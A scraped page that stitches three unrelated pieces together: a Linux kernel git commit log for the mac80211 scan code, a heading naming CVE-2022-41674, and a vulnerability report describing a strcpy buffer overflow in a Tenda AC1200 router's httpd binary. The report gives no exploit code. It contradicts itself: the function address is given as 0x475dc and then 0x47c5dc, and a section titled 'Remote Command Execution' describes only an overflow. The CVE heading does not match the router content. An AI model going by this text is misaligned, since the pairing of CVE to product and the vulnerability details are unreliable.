AgeCommit message (Expand)AuthorFilesLines 2022-09-04Merge tag 'wireless-next-2022-09-03' of git://git.kernel.org/pub/scm/linux/ke...David S. Miller1\-1/+1 2022-09-03wifi: mac80211: fix double SW scan stopJohannes Berg1\-1/+1 2022-08-25wifi: mac80211: Fix UAF in ieee80211\_scan\_rx()Siddh Raman Pant1\-4/+7 2022-07-15wifi: mac80211: fix multi-BSSID element parsingJohannes Berg1\-4/+8 2022-06-20wifi: mac80211: move interface config to new structJohannes Berg1\-1/+1 2022-05-04mac80211: upgrade passive scan to active scan on DFS channels after beacon rxFelix Fietkau1\-0/+20 2021-09-23mac80211: always allocate struct ieee802\_11\_elemsJohannes Berg1\-6/+10 2021-05-31mac80211: fix skb length check in ieee80211\_scan\_rx()Du Cheng1\-5/+16 2020-09-28mac80211: convert S1G beacon to scan resultsThomas Pedersen1\-4/+13 2020-09-28mac80211: s1g: choose scanning width based on frequencyThomas Pedersen1\-0/+17 2020-09-28nl80211/cfg80211: support 6 GHz scanningTova Mussai1\-2/+7 2020-07-31mac80211: remove unused flags argument in transmit functionsMathy Vanhoef1\-1/+1 2020-07-31mac80211: use same flag everywhere to avoid sequence number overwriteMathy Vanhoef1\-4/+3 2020-07-31nl80211: S1G band and channel definitionsThomas Pedersen1\-0/+1 2020-05-31mac80211: Add HE 6GHz capabilities element to probe requestIlan Peer1\-8/+9 2020-05-31mac80211: avoid using ext NSS high BW if not supportedJohannes Berg1\-0/+6 2020-04-24mac80211: add freq\_offset to RX statusThomas Pedersen1\-1/+2 2020-04-24mac80211: handle channel frequency offsetThomas Pedersen1\-0/+1 2020-02-21cfg80211: remove support for adjacent channel compensationEmmanuel Grumbach1\-2/+1 2019-10-07mac80211: fix scan when operating on DFS channels in ETSI domainsAaron Komisar1\-2/+28 2019-06-19treewide: Replace GPLv2 boilerplate/reference with SPDX - rule 500Thomas Gleixner1\-4/+1 2019-02-08mac80211: support multi-bssidSara Sharon1\-2/+9 2019-02-08mac80211: move the bss update from elements to an helperSara Sharon1\-70/+80 2019-02-08mac80211: pass bssids to elements parsing functionSara Sharon1\-35/+40 2018-11-09mac80211: allow hardware scan to fall back to softwareJohannes Berg1\-4/+18 2018-06-30Merge tag 'mac80211-next-for-davem-2018-06-29' of git://git.kernel.org/pub/sc...David S. Miller1\-6/+50 2018-06-15mac80211: support scan features for improved scan privacyJohannes Berg1\-5/+30 2018-06-15mac80211: split ieee80211\_send\_probe\_req()Johannes Berg1\-2/+20 2018-06-15mac80211: add probe request building flagsJohannes Berg1\-3/+4 2018-06-12treewide: kzalloc() -> kcalloc()Kees Cook1\-1/+1 2018-03-21mac80211: inform wireless layer when frame RSSI is invalidTosoni1\-1/+3 2017-09-21mac80211: oce: enable receiving of bcast probe respRoee Zamir1\-9/+28 2017-04-28cfg80211: add request id to cfg80211\_sched\_scan\_\*() apiArend Van Spriel1\-2/+2 2017-04-28mac80211: separate encoding/bandwidth from flagsJohannes Berg1\-4/+4 2017-04-28mac80211: clean up rate encoding bits in RX statusJohannes Berg1\-4/+4 2016-12-13mac80211: Remove unused 'len' variableKirtika Ruchandani1\-5/+3 2016-09-15mac80211: fix scan completed tracingJohannes Berg1\-1/+1 2016-07-06mac80211: report failure to start (partial) scan as scan abortJohannes Berg1\-2/+3 2016-07-06mac80211: Add support for beacon report radio measurementAvraham Stern1\-8/+34 2016-07-06nl80211: support beacon report scanningAvraham Stern1\-2/+7 2016-04-12cfg80211: remove enum ieee80211\_bandJohannes Berg1\-6/+6 2016-04-05mac80211: Support a scan request for a specific BSSIDJouni Malinen1\-1/+3 2016-04-05mac80211: allow drivers to report CLOCK\_BOOTTIME for scan resultsJohannes Berg1\-1/+3 2016-01-26mac80211: Requeue work after scan complete for all VIF types.Sachin Kulkarni1\-1/+11 2016-01-14mac80211: handle sched\_scan\_stopped vs. hw restart raceEliad Peller1\-0/+8 2015-12-02mac80211: do not actively scan DFS channelsAntonio Quartulli1\-4/+5 2015-11-03mac80211: don't reconfigure sched scan in case of wowlanEliad Peller1\-5/+7 2015-10-14mac80211: remove PM-QoS listenerJohannes Berg1\-1/+0 2015-10-13mac80211: use new cfg80211\_inform\_bss\_frame\_data() APIJohannes Berg1\-10/+9 2015-06-10mac80211: convert HW flags to unsigned long bitmapJohannes Berg1\-5/+5 2015-06-09mac80211: ignore invalid scan RSSI valuesSara Sharon1\-1/+7 2015-06-02mac80211: rename single hw-scan flag to follow naming conventionJohannes Berg1\-3/+3 2015-03-30mac80211: IBSS fix scan requestJanusz.Dziedzic@tieto.com1\-9/+16 2015-01-23mac80211: complete scan work immediately if quiesced or suspendedLuciano Coelho1\-0/+5 2015-01-14mac80211: don't defer scans in case of radar detectionEliad Peller1\-1/+1 2015-01-14mac80211: remove local->radar\_detect\_enabledEliad Peller1\-1/+1 2015-01-14mac80211: let flush() drop packets when possibleEmmanuel Grumbach1\-2/+2 2014-11-19mac80211: allow drivers to support NL80211\_SCAN\_FLAG\_RANDOM\_ADDRJohannes Berg1\-10/+38 2014-11-19mac80211: rcu-ify scan and scheduled scan request pointersJohannes Berg1\-30/+49 2014-11-19mac80211: remove redundant checkEliad Peller1\-1/+1 2014-09-05mac80211: add Intel Mobile Communications copyrightJohannes Berg1\-0/+1 2014-08-26mac80211: scan: Replace rcu\_assign\_pointer() with RCU\_INIT\_POINTER()Andreea-Cristina Bernat1\-1/+1 2014-06-25mac80211: split sched scan IEsDavid Spinadel1\-23/+24 2014-06-25mac80211: support more than one band in scan requestDavid Spinadel1\-25/+60 2014-05-09mac80211: handle failed restart/resume betterJohannes Berg1\-5/+10 2014-04-09mac80211: use RCU\_INIT\_POINTERMonam Agarwal1\-5/+5 2014-03-19mac80211: release sched\_scan\_sdata when stopping sched scanAlexander Bondar1\-2/+4 2014-02-20mac80211: allow driver to return error from sched\_scan\_stopJohannes Berg1\-1/+1 2014-02-11mac80211: fix IE buffer lenDavid Spinadel1\-5/+2 2013-12-16mac80211: reschedule sched scan after HW restartDavid Spinadel1\-14/+39 2013-12-16Merge remote-tracking branch 'wireless-next/master' into mac80211-nextJohannes Berg1\-1/+1 2013-12-06Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/linvil...John W. Linville1\-1/+1 2013-12-05mac80211: start\_next\_roc only if scan was actually runningEliad Peller1\-1/+3 2013-12-05mac80211: determine completed scan type by defined opsEliad Peller1\-8/+7 2013-12-03mac80211: remove duplicate codeEliad Peller1\-8/+0 2013-11-25cfg80211: consolidate passive-scan and no-ibss flagsLuis R. Rodriguez1\-5/+5 2013-11-25mac80211: fix scheduled scan rtnl deadlockJohannes Berg1\-1/+1 2013-11-04Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/linvil...John W. Linville1\-0/+19 2013-10-23Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/netDavid S. Miller1\-0/+19 2013-10-09mac80211: correctly close cancelled scansEmmanuel Grumbach1\-0/+19 2013-09-26mac80211: change beacon/connection pollingStanislaw Gruszka1\-2/+1 2013-07-16mac80211: allow scanning for 5/10 MHz channels in IBSSSimon Wunderlich1\-6/+39 2013-07-16mac80211: select and adjust bitrates according to channel modeSimon Wunderlich1\-2/+25 2013-06-13mac80211: track AP's beacon rate and give it to the driverAlexander Bondar1\-0/+9 2013-04-16mac80211: parse VHT channel switch IEsJohannes Berg1\-1/+1 2013-04-08mac80211: check ERP info IE length in parserJohannes Berg1\-3/+2 2013-03-25mac80211: Use a cfg80211\_chan\_def in ieee80211\_hw\_conf\_chanKarl Beldan1\-3/+3 2013-03-18mac80211: pass queue bitmap to flush operationJohannes Berg1\-2/+2 2013-03-11mac80211: remove a few set but unused variablesJohannes Berg1\-3/+0 2013-02-15mac80211: add radar detection command/eventSimon Wunderlich1\-0/+3 2013-02-11mac80211: Add flushes before going off-channelSeth Forshee1\-0/+3 2013-02-11mac80211: Fix tx queue handling during scansSeth Forshee1\-3/+6 2013-02-11mac80211: introduce beacon-only timing dataJohannes Berg1\-1/+4 2013-02-11cfg80211: pass wiphy to cfg80211\_ref\_bss/put\_bssJohannes Berg1\-1/+2 2013-01-31mac80211: improve latency and throughput while software scanningStanislaw Gruszka1\-27/+5 2013-01-31mac80211: start auth/assoc timeout on frame statusJohannes Berg1\-1/+2 2013-01-31mac80211: remove unused mesh data from bssJohannes Berg1\-9/+0 2013-01-31mac80211: remove last\_probe\_resp from bssJohannes Berg1\-3/+0 2013-01-28Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/linvil...John W. Linville1\-10/+5 2013-01-16mac80211: synchronize scan off/on-channel and PS statesStanislaw Gruszka1\-10/+5 2013-01-03mac82011: use frame control to differentiate probe resp/beaconEmmanuel Grumbach1\-5/+4 2013-01-03mac80211: fix dtim\_period in hidden SSID AP associationJohannes Berg1\-12/+0 2013-01-03mac80211: fix ibss scanningStanislaw Gruszka1\-10/+24 2012-12-11Merge branch 'for-john' of git://git.sipsolutions.net/mac80211-nextJohn W. Linville1\-1/+1 2012-12-10mac80211: a few whitespace fixesJohannes Berg1\-1/+1 2012-12-06Merge branch 'for-john' of git://git.kernel.org/pub/scm/linux/kernel/git/jber...John W. Linville1\-9/+12 2012-11-30mac80211: make ieee80211\_build\_preq\_ies saferJohannes Berg1\-9/+12 2012-11-26Merge branch 'for-john' of git://git.kernel.org/pub/scm/linux/kernel/git/jber...John W. Linville1\-8/+1 2012-11-23cfg80211: use DS or HT operation IEs to determine BSS channelJohannes Berg1\-8/+1 2012-11-21Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/linvil...John W. Linville1\-1/+1 2012-10-31mac80211: init sched\_scan\_iesDavid Spinadel1\-1/+1 2012-10-18mac80211: add support for tx to abort low priority scan requestsSam Leffler1\-4/+17 2012-10-17mac80211: use channel contextsJohannes Berg1\-2/+2 2012-10-16mac80211: track whether to use channel contextsJohannes Berg1\-0/+4 2012-09-07net/mac80211/scan.c: removes unnecessary semicolonPeter Senna Tschudin1\-1/+1 2012-09-06mac80211: don't hang on to sched\_scan\_iesJohannes Berg1\-25/+14 2012-09-06Merge remote-tracking branch 'mac80211/master' into mac80211-nextJohannes Berg1\-2/+1 2012-08-20mac80211: pass channel to ieee80211\_send\_probe\_reqJohannes Berg1\-1/+2 2012-08-20mac80211: check operating channel in scanJohannes Berg1\-5/+4 2012-07-30mac80211: don't clear sched\_scan\_sdata on sched scan stop requestEliad Peller1\-1/+0 2012-07-30Merge remote-tracking branch 'wireless/master' into mac80211Johannes Berg1\-58/+65 2012-07-24mac80211: fix scan\_sdata assignmentJohannes Berg1\-1/+1 2012-07-20Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/linvil...John W. Linville1\-54/+62 2012-07-12mac80211: add time synchronisation with BSS for assocJohannes Berg1\-1/+2 2012-07-12mac80211: redesign scan RXJohannes Berg1\-34/+23 2012-07-12mac80211: track scheduled scan virtual interfaceJohannes Berg1\-10/+10 2012-07-12mac80211: make scan\_sdata pointer usable with RCUJohannes Berg1\-9/+24 2012-07-12mac80211: fix invalid band deref building preq IEsArik Nemtsov1\-0/+3 2012-06-12Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/linvil...John W. Linville1\-2/+2 2012-06-06mac80211: unify SW/offload remain-on-channelJohannes Berg1\-2/+2 2012-06-04net: Remove casts to same typeJoe Perches1\-2/+1 2012-05-09mac80211: Convert compare\_ether\_addr to ether\_addr\_equalJoe Perches1\-1/+1 2012-04-23mac80211: Support on-channel scan option.Ben Greear1\-26/+69 2012-04-13mac80211: remove ieee80211\_rx\_bss\_getMohammed Shafi Shajakhan1\-14/+0 2012-04-13mac80211: do not scan and monitor connection in parallelStanislaw Gruszka1\-1/+28 2012-03-28mac80211: fix oper channel timestamp updationRajkumar Manoharan1\-1/+1 2012-03-07mac80211: Filter duplicate IE idsPaul Stewart1\-20/+51 2012-03-05mac80211: use compare\_ether\_addr on MAC addresses instead of memcmpFelix Fietkau1\-1/+2 2012-01-05Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/linvil...John W. Linville1\-1/+1 2012-01-04mac80211: fix scan state machineMohammed Shafi Shajakhan1\-1/+1 2011-12-19net: fix assignment of 0/1 to bool variables.Rusty Russell1\-1/+1 2011-11-30mac80211: revert on-channel work optimisationsJohannes Berg1\-2/+2 2011-11-22Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/torval...John W. Linville1\-0/+1 2011-11-11mac80211: simplify scan state machineJohannes Berg1\-122/+77 2011-10-31net: Add export.h for EXPORT\_SYMBOL/THIS\_MODULE to non-modulesPaul Gortmaker1\-0/+1 2011-10-25Merge branch 'pm-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/...Linus Torvalds1\-1/+1 2011-10-11mac80211: pass no-CCK flag through to HW scanJohannes Berg1\-0/+1 2011-09-27mac80211: Send the management frame at requested rateRajkumar Manoharan1\-1/+2 2011-08-25PM QoS: Move and rename the implementation filesJean Pihet1\-1/+1 2011-07-19mac80211: implement scan supported ratesJohannes Berg1\-3/+3 2011-07-11Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/linvil...John W. Linville1\-1/+2 2011-07-07mac80211: fix ie memory allocation for scheduled scansLuciano Coelho1\-1/+2 2011-06-27mac80211: Drop DS Channel PARAM in directed probePaul Stewart1\-1/+2 2011-06-27mac80211: restrict advertised HW scan ratesJohannes Berg1\-2/+3 2011-06-17mac80211: add cancel\_hw\_scan() callbackEliad Peller1\-16/+21 2011-05-27mac80211: Remove duplicate linux/slab.h include from net/mac80211/scan.cJesper Juhl1\-1/+0 2011-05-16mac80211: abort scan\_work immediately when the device goes downRajkumar Manoharan1\-0/+5 2011-05-12cfg80211/mac80211: avoid bounce back mac->cfg->mac on sched\_scan\_stoppedLuciano Coelho1\-6/+27 2011-05-11mac80211: add support for HW scheduled scanLuciano Coelho1\-0/+99 2011-05-10mac80211: don't drop frames where skb->len < 24 in ieee80211\_scan\_rx()Luciano Coelho1\-1/+1 2011-03-07mac80211: fix scan race, simplify codeJohannes Berg1\-40/+24 2011-02-09mac80211: Ensure power-level set properly for scanning.Ben Greear1\-1/+8 2011-02-09mac80211: Allow scanning on existing channel-type.Ben Greear1\-4/+2 2011-02-04mac80211: Optimize scans on current operating channel.Ben Greear1\-25/+63 2011-01-21cfg80211: Extend channel to frequency mapping for 802.11jBruno Randolf1\-1/+2 2010-10-07mac80211: fix sw scan lockingJohannes Berg1\-2/+1 2010-10-06mac80211: avoid uninitialized var warning in ieee80211\_scan\_cancelJohn W. Linville1\-3/+4 2010-10-06mac80211: compete scan to cfg80211 if deferred scan fail to startStanislaw Gruszka1\-0/+2 2010-10-06mac80211: do not requeue scan work when not neededStanislaw Gruszka1\-12/+3 2010-10-06mac80211: assure we also cancel deferred scan requestStanislaw Gruszka1\-10/+25 2010-10-06mac80211: keep lock when calling \_\_ieee80211\_scan\_completed()Stanislaw Gruszka1\-36/+39 2010-10-06mac80211: reduce number of \_\_ieee80211\_scan\_completed callsStanislaw Gruszka1\-22/+29 2010-09-24mac80211: Add DS Parameter Set into Probe Request on 2.4 GHzJouni Malinen1\-1/+2 2010-09-24mac80211: Filter ProbeReq SuppRates based on TX rate maskJouni Malinen1\-1/+1 2010-08-27mac80211: allow scan to complete from any contextJohannes Berg1\-8/+26 2010-08-16mac80211: per interface idle notificationJohannes Berg1\-0/+2 2010-08-16mac80211: unify scan and work mutexesJohannes Berg1\-15/+15 2010-08-04mac80211: fix scan locking wrt. hw scanJohannes Berg1\-14/+0 2010-07-29mac80211: allow drivers to request DTIM periodJohannes Berg1\-0/+4 2010-07-28Revert "mac80211: fix sw scan bracketing"Luis R. Rodriguez1\-2/+2 2010-06-21mac80211: Fix compile warning in scan.c.Gertjan van Wingerde1\-1/+1 2010-06-18mac80211: fix sw scan bracketingJohannes Berg1\-2/+2 2010-05-20Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next-2.6Linus Torvalds1\-19/+107 2010-05-05Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/linvil...John W. Linville1\-13/+40 2010-05-03mac80211: improve IBSS scanningJohannes Berg1\-1/+27 2010-04-28mac80211: do not wip out old supported ratesStanislaw Gruszka1\-10/+11 2010-04-27mac80211: give virtual interface to hw\_scanJohannes Berg1\-2/+2 2010-04-15Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/linvil...John W. Linville1\-0/+2 2010-04-11Merge branch 'master' of master.kernel.org:/pub/scm/linux/kernel/git/davem/ne...David S. Miller1\-0/+1 2010-04-08mac80211: enhance tracingJohannes Berg1\-0/+2 2010-03-30include cleanup: Update gfp.h and slab.h includes to prepare for breaking imp...Tejun Heo1\-0/+1 2010-03-09mac80211: Improve software scan timingHelmut Schaa1\-6/+65 2010-02-08Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/linvil...John W. Linville1\-8/+19 2010-02-08mac80211: fix deferred hardware scan requestsJohannes Berg1\-8/+10 2010-01-26mac80211: wait for beacon before enabling powersaveJohannes Berg1\-4/+0 2010-01-12mac80211: add U-APSD client supportKalle Valo1\-0/+18 2010-01-12mac80211: fix a few work bugsJohannes Berg1\-0/+1 2010-01-06Revert "mac80211: replace netif\_tx\_{start,stop,wake}\_all\_queues"John W. Linville1\-5/+5 2010-01-05mac80211: No need to include WEXT headers hereJouni Malinen1\-1/+0 2009-12-28mac80211: Generalize off-channel operation helpers from scan codeJouni Malinen1\-150/+6

CVE-2022-41674: git/torvalds/linux.git - Linux kernel source tree

Tenda AC1200 US_AC6V2.0RTL_V15.03.06.51_multi_TDE01 was discovered to contain a buffer overflow in the 0x475dc function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.

**Vulnerability Report**

Vendor: Tenda

Product: AC1200 Smart Dual-Band WiFi Router

Version: US\_AC6V2.0RTL\_V15.03.06.51\_multi\_TDE01(Download Link:https://www.tendacn.com/download/detail-3794.html)

Type: Buffer Overflow

**Vulnerability description**

We found a buffer overflow vulnerability in AC1200 with firmware which was released recently, allows remote attackers to destory the execution memory from a crafted request. This can cause a denial of service or impact code execution.

**Remote Command Execution**

In httpd binary:

In function 0x47c5dc, take the content before ';' of recv_buf to pcVar2 through strchr. If the content is not empty, then take the content after the 'set' and store it in pcVar2.

Then pcVar2 is copied into name by strcpy. However the length of pcVar2 is not checked. The buffer for name is 64 bytes. The original recv_buf length is 4096 bytes, so the length of pcVar2 may be greater than 64 bytes. This results in a buffer overflow.

Tag

#wifi